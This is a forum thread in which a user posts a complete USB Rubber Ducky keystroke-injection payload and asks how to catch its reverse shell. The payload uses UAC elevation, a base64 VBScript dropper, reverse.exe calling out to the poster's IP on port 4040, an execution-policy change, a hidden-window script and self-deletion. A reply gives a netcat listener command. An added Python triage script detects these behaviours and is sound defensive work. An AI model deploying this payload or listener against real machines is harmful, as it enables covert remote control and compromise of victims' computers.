sybo2 Posted August 21, 2014
I used the Ducky Toolkit web page and created a .bin file with a reverse shell to my IP on port 4040. I then loaded the Ducky into my test machine... it seems to have run... how do I view/see what's on my test machine? Thanks for your help!
spazi (Guest) Posted August 21, 2014
I'm sorry, I don't really understand the question. Can you be more specific?
sybo2 Posted August 21, 2014 (Author)
What kind of reverse shell did the Ducky Toolkit create? I have seen some samples on Hak5 of a reverse shell... they usually use Linux to access the test machine through the reverse shell... is that what is needed to gain remote admin on the test machine? Thanks for your reply.
spazi (Guest) Posted August 22, 2014 (edited)
No, I was referring to: "how do I view/see what's on my test machine?" But I think I understand your question now. Could you be more specific about what OS your victim PC is using? What OS does your attacker PC have? Well, I don't know what script you are using, but I'm guessing it involves netcat if the test/target/victim machine is running Linux. It depends on your Ducky script, but on your main/attacker machine you can type "nc -l [port number]", for instance "nc -l 4040"; that makes netcat listen for any TCP connection on port 4040 and gives you a shell prompt. Now you can do whatever on the computer if you are Admin/root. That depends on the script. I'm guessing your script creates a TCP connection from your victim PC to your attacker PC.
Edited August 22, 2014 by spazi
sybo2 Posted August 22, 2014 Author Share Posted August 22, 2014 i'm sorry both the attacker and victim machines are windows 64 bit 8.1 pro and the script that was run on the victims machine with the rubber ducky was generated at the ducktoolkit.com as shown below: I think that you do understand my question... how do i listen for/view the victims machine on my attacker machine. do I need to download netcat... does it run in windows... or should i be using KALI linux to run netcat. Thanks for your kind help. DELAY 750 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ALT y DELAY 750 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $decoder = 'Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write 
bytes:binaryStream.SaveToFile file, 2:End Sub' ENTER STRING $reverse = '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' ENTER STRING Set-Content -Value $decoder -Path C:\decoder.vbs ENTER STRING Set-Content -Value $reverse -Path C:\reverse.txt ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 22.222.22.222 4040 *************(my host IP 22.222.22.222) (my host port 4040) ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 750 STRING C:\Windows\config-faa25.ps1 ENTER DELAY 750 ALT F4 DELAY 750 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 750 ALT y DELAY 750 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 750 STRING m DELAY 750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER Quote Link to comment Share on other sites More sharing options...
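A defender-side triage script for a captured Ducky payload like the one posted above: it reconstructs what the device would type, flags the risky behaviours in it (UAC elevation prompt, execution-policy change, hidden window, base64 dropper, self-deletion, writes under C:\Windows), pulls out the file paths and the ip/port the payload would connect to, and then checks those artifacts against host logs, which is the defender's view of the connection spazi describes the listener receiving. This is an added example written for this thread, not ducktoolkit's or Hak5's code. It assumes REPEAT n means n further presses of the previous key, uses the TEST-NET address 203.0.113.5 in place of the poster's host IP, and the indicator names and Sysmon-style log lines are constructed for the example.

```python
"""Triage a captured USB Rubber Ducky script from the defender's side.
Added example for this thread; not Hak5's or ducktoolkit's code."""
import re
from collections import Counter

# Constructed excerpt of the ducktoolkit payload posted in the thread. 203.0.113.5 is a
# documentation (TEST-NET-3) address standing in for the poster's real host IP.
SAMPLE = r"""
REM constructed excerpt; the base64 blob is replaced by a placeholder
DELAY 750
GUI r
STRING powershell Start-Process notepad -Verb runAs
ENTER
ALT y
DOWNARROW
REPEAT 50
ENTER
STRING $decoder = 'Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":Set binaryStream = CreateObject("ADODB.Stream")'
ENTER
STRING Set-Content -Value $decoder -Path C:\decoder.vbs
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING c:\reverse.exe 203.0.113.5 4040
ENTER
STRING Remove-Item $MyInvocation.InvocationName
ENTER
CTRL S
STRING C:\Windows\config-faa25.ps1
ENTER
DELAY 750
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER
"""

# Constructed Sysmon-style log lines (EID1 = process create, EID3 = network connect).
SAMPLE_LOGS = [
    r"EID3 Image=C:\reverse.exe DestinationIp=203.0.113.5 DestinationPort=4040",
    r"EID1 Image=C:\Windows\System32\cscript.exe CommandLine=cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe",
    r"EID3 Image=C:\Program Files\Mozilla Firefox\firefox.exe DestinationIp=93.184.216.34 DestinationPort=443",
]

# Indicator names are this example's own, not a standard taxonomy.
INDICATORS = {
    "uac_elevation":    re.compile(r"Start-Process\s+\S+\s+-Verb\s+runAs", re.I),
    "execution_policy": re.compile(r"Set-ExecutionPolicy\s+'?(Unrestricted|Bypass)", re.I),
    "hidden_window":    re.compile(r"-windowstyle\s+hidden", re.I),
    "base64_dropper":   re.compile(r"bin\.base64|ADODB\.Stream", re.I),
    "self_delete":      re.compile(r"Remove-Item\s+\$MyInvocation", re.I),
    "write_system_dir": re.compile(r"C:\\Windows\\", re.I),
    "remote_endpoint":  re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b"),
}
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"]+")
ENDPOINT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def parse_ducky(text):
    """Split a Ducky script into (command, argument) pairs. REPEAT n is taken to mean
    'n more copies of the previous command' (assumed semantics); REM lines are comments."""
    cmds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "REPEAT" and cmds:
            cmds.extend([cmds[-1]] * int(arg))
        else:
            cmds.append((cmd, arg))
    return cmds


def typed_lines(cmds):
    """Reconstruct the text lines the device types: STRING chunks accumulate until an
    ENTER ends the line. Shortcut keys (GUI r, ALT y, DOWNARROW) are not text."""
    lines, buf = [], ""
    for cmd, arg in cmds:
        if cmd == "STRING":
            buf += arg
        elif cmd == "ENTER":
            if buf:
                lines.append(buf)
            buf = ""
    return lines + ([buf] if buf else [])


def extract_artifacts(lines):
    """Collect file paths (lower-cased to dedupe) and 'ip port' endpoints the payload types."""
    paths, endpoints = set(), set()
    for line in lines:
        paths.update(p.lower() for p in PATH_RE.findall(line))
        endpoints.update((ip, int(port)) for ip, port in ENDPOINT_RE.findall(line))
    return {"paths": sorted(paths), "endpoints": sorted(endpoints)}


def triage(script):
    cmds = parse_ducky(script)
    lines = typed_lines(cmds)
    hits = {n: [l for l in lines if p.search(l)] for n, p in INDICATORS.items()}
    return {
        "keys": Counter(c for c, _ in cmds),                 # e.g. number of DOWNARROW presses
        "typed_lines": lines,
        "indicators": {n: v for n, v in hits.items() if v},  # only rules that fired
        "artifacts": extract_artifacts(lines),
    }


def match_logs(report, log_lines):
    """Return log lines mentioning a path or endpoint from the report: what a hunt for
    this payload's execution would look for on the host (case-insensitive)."""
    needles = list(report["artifacts"]["paths"]) + [
        f"destinationip={ip} destinationport={port}" for ip, port in report["artifacts"]["endpoints"]]
    return [l for l in log_lines if any(n in l.lower() for n in needles)]


if __name__ == "__main__":
    rep = triage(SAMPLE)
    print("indicators:", sorted(rep["indicators"]))
    print("artifacts:", rep["artifacts"])
    print("matching log lines:", match_logs(rep, SAMPLE_LOGS))
```

Run it against the real script file instead of SAMPLE to get the full list of typed PowerShell lines; the `artifacts` section is what to search for in process-creation and network-connection telemetry after a suspected Ducky insertion.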
spazi (Guest) Posted August 23, 2014
Personally I would use Kali or any Linux distro on the attack machine, but that's just me. There is probably some program you can use on your Windows machine, but I don't know which one. You don't have to install Kali on your PC. You can put it on a USB pen drive and boot it from there. Especially if you are just messing around :)